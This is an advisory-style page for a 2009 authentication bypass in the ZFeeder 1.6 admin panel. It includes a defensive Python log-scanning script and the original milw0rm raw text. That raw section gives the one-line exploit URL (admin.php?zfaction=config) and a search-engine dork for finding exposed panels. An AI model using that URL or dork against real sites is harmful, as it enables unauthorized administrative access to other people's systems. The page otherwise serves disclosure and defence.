Remote Bypass Admin Panel
Vendor: ZFeeder
By: ahmadbady
CVSS: 9.3 (HIGH)
CWE: N/A
Product Name: ZFeeder
Affected Version From: 1.6
Affected Version To: 1.6
Patch Exists: YES
Related CWE: N/A
CPE: a:zvonnews:zfeeder:1.6
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2009

Remote Bypass Admin Panel

ZFeeder 1.6 is vulnerable to a remote authentication bypass of its admin panel. An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable application, which bypasses the authentication process and gives access to the admin panel.

Mitigation:

Upgrade to the latest version of ZFeeder.
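
Until the upgrade is in place, web server access logs can be reviewed for admin panel requests from unexpected sources. The following is an added example, not part of the original advisory or of ZFeeder: it assumes Combined Log Format and a hypothetical allowlist of admin networks, and because the page does not describe how ZFeeder authenticates, it flags by source address rather than trying to tell authenticated requests from bypassed ones.

```python
import re
from ipaddress import ip_address, ip_network
from urllib.parse import urlsplit, parse_qs, unquote

# Assumption: networks from which admin access is expected (hypothetical values).
ADMIN_ALLOWLIST = [ip_network("10.0.0.0/8"), ip_network("127.0.0.0/8")]

# Combined Log Format: ip ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def flag_admin_requests(lines, allowlist=ADMIN_ALLOWLIST):
    """Return (ip, time, target, status) for admin.php?zfaction=... requests
    whose source address is outside the allowlist."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        url = urlsplit(m["target"])
        # Decode percent-encoding before comparing the script name.
        if not unquote(url.path).lower().endswith("/admin.php"):
            continue
        if "zfaction" not in parse_qs(url.query, keep_blank_values=True):
            continue
        try:
            src = ip_address(m["ip"])
        except ValueError:
            continue  # hostname or garbage in the client field
        if not any(src in net for net in allowlist):
            hits.append((m["ip"], m["time"], m["target"], int(m["status"])))
    return hits

# Constructed sample log lines (documentation address ranges, not real traffic).
SAMPLE_LOG = [
    '10.1.2.3 - - [23/Feb/2009:10:00:01 +0000] "GET /zfeeder/admin.php?zfaction=config HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [23/Feb/2009:10:02:13 +0000] "GET /zfeeder/admin.php?zfaction=config HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [23/Feb/2009:10:03:40 +0000] "GET /zfeeder/admin.php HTTP/1.1" 200 800 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [23/Feb/2009:10:04:02 +0000] "GET /zfeeder/index.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in flag_admin_requests(SAMPLE_LOG):
        print(hit)
```

A flagged request that returned status 200 deserves the closest look, since it means the configuration page was served to an address outside the expected admin networks.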

Exploit-DB raw data:

-----------------:remote bypass admin panel:-----------------
-------------------------------------------------------
script:zfeeder 1.6
    
------------------------------------------------------------------
download from:http://www.mirrorservice.org/sites/download.sourceforge.net/pub/sourceforge/z/zv/zvonnews/zfeeder-1.6.zip
   
------------------------------------------------------------------
.......................................................
xpl:

http://127.0.0.1/path/admin.php?zfaction=config
------------------------------------------------------

dork: intitle:"zFeeder admin panel"
-----------------------------------------------------

***************************************************
***************************************************
---------------------------------------------------
Author: ahmadbady  [kivi_hacker666@yahoo.com]
---------------------------------------------------

# milw0rm.com [2009-02-23]